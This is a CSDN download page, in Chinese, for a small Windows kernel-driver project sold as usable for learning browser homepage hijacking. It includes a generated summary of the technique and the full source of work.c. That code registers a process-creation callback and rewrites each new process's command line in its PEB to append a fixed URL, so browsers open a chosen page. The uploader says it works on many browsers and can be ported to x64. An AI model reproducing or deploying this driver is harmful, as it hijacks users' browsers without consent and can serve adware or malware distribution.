内核修改进程启动参数源码,可用于学习浏览器劫持_edge浏览器首页变成360资源-CSDN文库

共6个文件

c：2个

h：2个

sources：1个

3星 · 超过75%的资源需积分: 9 53 浏览量 2016-08-11 22:30:21 上传评论 1 收藏 6KB ZIP 举报

标题中的“内核修改进程启动参数源码”指的是在操作系统内核级别修改程序启动时的命令行参数。这种技术常用于系统级别的优化、调试或安全控制，但也可能被滥用进行恶意活动，例如“主页劫持”。主页劫持是指黑客通过篡改用户浏览器的设置，使其每次打开浏览器时自动跳转到指定的网页，通常是为了推广广告或者进行非法活动。描述中提到的“自己小改一下即可支持x64系统”意味着原始的源码是为32位（x86）系统设计的，但通过少量的代码调整，可以使其兼容64位（x64）系统。这涉及到对不同架构下的编程理解，以及如何处理指针、内存管理和系统调用的差异。 “zip里源码是支持x86的”，表明提供的压缩包中包含的源代码是针对32位操作系统的。在32位系统中，处理器使用32位的数据宽度来处理指令和数据，而在64位系统中，处理器则使用64位的数据宽度，这导致了编译器、链接器和库的不同，需要适配工作。 “实际测试很多浏览器都OK”意味着这个内核修改方法已经在多种浏览器上进行了测试，并且能够成功地应用到这些浏览器的进程中。这可能包括常见的如Chrome、Firefox、Edge等，也可能包括一些不太知名的浏览器。这也暗示了该方法的普适性，但同时也提醒我们要注意潜在的安全风险，因为如果这个修改被用于恶意目的，那么用户的浏览器行为可能会被轻易操纵。标签“主页劫持”进一步强调了这个技术可能被滥用的方向。主页劫持是一种常见的网络攻击手段，通过篡改浏览器设置或注入恶意代码，使得用户每次打开浏览器时都会被重定向到攻击者指定的网站。这不仅影响用户体验，还可能成为其他恶意软件传播的入口。综合以上信息，我们可以总结出以下知识点： 1. 内核级编程：涉及操作系统底层的编程，如修改进程启动参数，这需要深入理解操作系统的工作原理和系统调用。 2. 系统架构兼容性：32位（x86）与64位（x64）系统之间的差异，以及如何进行代码适配以实现跨平台运行。 3. 浏览器安全：了解浏览器的工作机制，防止被恶意修改启动参数，以保护用户的浏览习惯和个人隐私。 4. 主页劫持技术：理解其工作原理，包括如何检测和防范，以提高网络安全意识。 5. 源代码分析与修改：通过阅读和修改源代码来扩展功能或修复问题，需要具备编程基础和逆向工程能力。 6. 测试与验证：在实际环境中测试代码的可行性和安全性，确保改动不会引发意外的问题。 7. 避免滥用技术：对于具有潜在风险的技术，应谨慎使用，遵循合法和道德的使用原则，防止技术被用于非法或有害的目的。

资源详情

资源评论

收起资源包目录

isdebug_回调改commandline.zip （6个子文件）

isdebug_回调改commandline

liketest.c 2KB

work.c 2KB

sources 243B

makefile 36B

liketest.h 1KB

work.h 7KB

#include <work.h> //回调 VOID CreateProcessNotify( IN HANDLE ParentId, IN HANDLE ProcessId, IN BOOLEAN Create ) { NTSTATUS status = STATUS_SUCCESS; PEPROCESS pEprocess = NULL; // 创建进程 if (Create) { status = PsLookupProcessByProcessId(ProcessId, &pEprocess); if (NT_SUCCESS(status)) { PFILE_OBJECT FilePointer = NULL; status = PsReferenceProcessFilePointer((PEPROCESS)pEprocess, &FilePointer); KAPC_STATE ApcState; PPEB peb; KeStackAttachProcess(pEprocess, &ApcState); peb = PsGetProcessPeb(pEprocess); //DbgPrint("++++%wZ+++++%wZ\r\n", &peb->ProcessParameters->CommandLine, &peb->ProcessParameters->ImagePathName); if (peb->ProcessParameters->CommandLine.Length - peb->ProcessParameters->ImagePathName.Length <= 6) { PWCHAR *tmp = peb->ProcessParameters->CommandLine.Buffer; wcscat(tmp, L"http://www.baidu.com/"); UNICODE_STRING Unicode_tmp; RtlInitUnicodeString(&Unicode_tmp, tmp); peb->ProcessParameters->CommandLine = Unicode_tmp; peb->ProcessParameters->WindowTitle = Unicode_tmp; DbgPrint("--->%wZ\r\n", &peb->ProcessParameters->CommandLine); } else { } KeUnstackDetachProcess(&ApcState); } } else { // 结束进程 } } VOID SetWork(IN BOOLEAN bState) { NTSTATUS status; if (bState) { // 注册回调 status = PsSetCreateProcessNotifyRoutine(CreateProcessNotify, FALSE); if (!NT_SUCCESS(status)) { DbgPrint("回调注册失败!"); return; } } else { status = PsSetCreateProcessNotifyRoutine(CreateProcessNotify, TRUE); if (!NT_SUCCESS(status)) { DbgPrint("回调摘除失败!"); return; } } } // 获取进程路径 VOID GetProcessPath(ULONG eprocess, PUNICODE_STRING pFilePath) { PFILE_OBJECT FilePointer = NULL; UNICODE_STRING name; //盘符 NTSTATUS status = STATUS_SUCCESS; status = PsReferenceProcessFilePointer((PEPROCESS)eprocess, &FilePointer); if (!NT_SUCCESS(status)) { DbgPrint("break out"); } ObReferenceObjectByPointer( (PVOID)FilePointer, 0, NULL, KernelMode); RtlVolumeDeviceToDosName((FilePointer)->DeviceObject, &name); //获取盘符名 RtlCopyUnicodeString(pFilePath, &name); //盘符连接 RtlAppendUnicodeStringToString(pFilePath, &(FilePointer)->FileName); //路径连接 ObDereferenceObject(FilePointer); //关闭对象引用 }

评论收藏

内容反馈

JAVA大大

2018-08-13

不错不错不错

内核修改进程启动参数源码,可用于学习浏览器劫持

评论2

最新资源

内核修改进程启动参数源码,可用于学习浏览器劫持

评论2

最新资源

相关推荐

浏览器劫持源码

易语言BHO源码，浏览器劫持技术

获取及修改其他进程启动命令行-易语言

进程启动参数查询

IE主页被篡改修复

使电脑浏览器变成手机的App浏览器(修改电脑浏览器UA）user-agent

易语言创建运行参数

查看游戏进程启动参数（附源代码）

监控获取进程启动命令行参数

基于IE内核的多进程浏览器Raptor 源码

易语言谷歌69内核最新浏览器源码

android应用源码---浏览器源码(AndroidChromium).rar

基于IE内核的浏览器，内含源码

基于IE内核的多进程浏览器源码

浏览器主页被恶意软件修改难以改回，修改浏览器主页的终极方法

BD2命令.doc

进程隐藏--通过直接修改内核实现

易语言改变运行中的程序名

VT过游戏保护，调试有保护的游戏

基于安卓Android的浏览器源码.zip

JAVA编写的Gecko内核浏览器源码

C++x64内核保护进程源码_保护进程_x64内核保护进程_进程保护_进程保护c++

chrome内核多标签浏览器c#源码

C# webkit为内核的浏览器打开网页源码__(0521).rar

易语言浏览器操作模块源码.7z

浏览器内核miniblink、cef、firefox源码

C# webkit为内核的浏览器打开网页源码__0525).rar

易语言仿360浏览器源码

C# 基于谷歌Chrome内核 cefsharp web浏览器 多标签实例源码

C# 使用chromium内核浏览器源码

C# 基于谷歌Chrome内核 cefsharp web浏览器多标签实例源码